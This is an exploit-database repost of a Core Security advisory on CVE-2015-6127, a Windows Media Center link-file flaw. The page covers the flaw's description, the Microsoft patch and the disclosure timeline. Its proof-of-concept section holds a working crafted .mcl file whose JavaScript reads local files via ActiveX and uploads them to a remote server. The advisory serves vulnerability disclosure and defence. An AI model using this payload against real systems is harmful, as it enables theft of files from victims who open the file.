[ authorization ] [ registration ] [ restore account ]
Contact us
You can contact us by:
0day Today Exploits Market and 0day Exploits Database

Microsoft Windows Media Center Link File Incorrectly Resolved Reference Exploit

Author
Core Security
Risk
[
Security Risk High
]
0day-ID
0day-ID-24691
Category
remote exploits
Date add
09-12-2015
CVE
CVE-2015-6127
Platform
windows
1. Advisory Information
 
Title: Microsoft Windows Media Center link file incorrectly resolved reference
Vendors contacted: Microsoft
Release mode: Coordinated release
 
2. Vulnerability Information
 
Class: Use of Incorrectly-Resolved Name or Reference [CWE-706]
Impact: Information leak
Remotely Exploitable: No
Locally Exploitable: Yes
CVE Name: CVE-2015-6127
 
  
 
3. Vulnerability Description
 
The 'application' tag in Microsoft [1] Windows Media Center link files (.mcl extension) can include a 'run' parameter, which indicates the path of a file to be launched when opening the MCL file, or a 'url' parameter, which indicates the URL of a web page to be loaded within the Media Center's embedded web browser.
 
A specially crafted MCL file having said 'url' parameter pointing to the MCL file itself can trick Windows Media Center into rendering the very same MCL file as a local HTML file within the Media Center's embedded web browser.
 
4. Vulnerable Packages
 
Windows 7 for x64-based Systems Service Pack 1 (with Internet Explorer 11 installed)
Other versions are probably affected too, but they were not checked.
 
5. Vendor Information, Solutions and Workarounds
 
Microsoft posted the following Security Bulletin: MS15-134 [2]
 
6. Credits
 
This vulnerability was discovered and researched by Francisco Falcon from Core Exploits Team. The publication of this advisory was coordinated by Joaquín Rodríguez Varela from the Core Advisories Team.
 
  
 
7. Technical Description / Proof of Concept Code
 
The ehexthost.exe binary, part of Windows Media Center, loads the given URL into an embedded instance of Internet Explorer running in the local machine zone, but it doesn't opt-in for the FEATURE_LOCALMACHINE_LOCKDOWN IE security feature, therefore this situation can be leveraged by an attacker to read and exfiltrate arbitrary files from a victim's local filesystem by convincing him to open a malicious MCL file.
 
The proof-of-concept shows an MCL file with embedded HTML + JS code, referencing itself in the 'url' parameter. Unlike what happens when loading a local HTML file into Internet Explorer 11, the JS code included here will automatically run with no prompts, and it will be able to read arbitrary local files using the MSXML2.XMLHTTP ActiveX object. Those read files then can be uploaded to an arbitrary remote web server.
 
Also note that, in order for the PoC to work, the value of the 'url' parameter must match the name of the MCL file.
 
7.1. Proof of Concept
 
A new file should be created with the name "poc-microsoft.mcl" and with the following content:
 
  
<application url="poc-microsoft.mcl"
name="Showcase"
bgcolor="RGB(255,255,255)"
sharedviewport="false">
<html>
<head>
<meta http-equiv="x-ua-compatible" content="IE=edge" >
</head>
<body>
<script type="text/javascript">
 
    function do_upload(fname, data){
        var xmlhttp = new XMLHttpRequest();
        xmlhttp.open("POST", "http://192.168.1.50/uploadfile.php", true);
        xmlhttp.setRequestHeader("Content-type", "multipart/form-data");
        xmlhttp.setRequestHeader("Connection", "close");
        xmlhttp.onreadystatechange = function(){if (xmlhttp.readyState == 4){alert(fname + " done.");}}
        xmlhttp.send(new Uint8Array(data));
    }
 
 
    function read_local_file(filename){
        /* Must use this one, XMLHttpRequest() doesn't allow to read local files */
        var xmlhttp = new ActiveXObject("MSXML2.XMLHTTP");
        xmlhttp.open("GET", filename, false);
        xmlhttp.send();
        return xmlhttp.responseBody.toArray();
    }
 
 
    function upload_file(filename){
        try{
            do_upload(filename, read_local_file(filename));
        }catch(e){
            alert(filename + " error: " + e);
        }
    }
 
 
    upload_file("file:///C:/Windows/System32/calc.exe");
 
</script>
</body>
</html>
 
</application>
      
  
 
8. Report Timeline
 
2015-09-24: Core Security sent the first notification to Microsoft.
2015-09-24: Microsoft acknowledged receipt of the email and requested a draft version of the advisory.
2015-09-25: Core Security sent Microsoft the draft version of the advisory including a PoC.
2015-09-25: Microsoft cased the report under MSRC 31305.
2015-10-02: Core Security requested Microsoft provide a status update and confirmation of the reported bug.
2015-10-02: Microsoft informed Core Security that they were able to reproduce the issue. They were still reviewing it to determine if they would address it in a security release.
2015-10-07: Core Security requested Microsoft let us know once they made a decision.
2015-10-08: Microsoft informed Core Security they would keep us updated.
2015-10-26: Core Security asked Microsoft if there were any updates regarding the reported bug and if they had an estimated time of availability.
2015-10-27: Microsoft informed Core Security that they would be pursuing a fix for the reported issue and are working on a release date for it.
2015-11-05: Core Security asked Microsoft if they had determined a release date for the fix and a CVE ID to the reported vulnerability.
2015-11-10: Microsoft informed Core Security that they were targeting the security fix for this issue in their December release. They also informed us that they assigned CVE-2015-6127 to this case.
2015-11-11: Core Security thanked Microsoft for their reply and clarified that we would be publishing the advisory on Tuesday, the 8 of December, 2015.
2015-11-12: Microsoft requested from Core Security the link where the advisory would be published and the name of the researcher that should appear in the acknowledgment.
2015-11-13: Core Security informed Microsoft of the link and name that should appear in the acknowledgment.
2015-11-16: Microsoft informed Core Security that they updated the CVE acknowledgment accordingly.
2015-12-08: Advisory CORE-2015-0014 published.

#  0day.today [2024-03-29]  #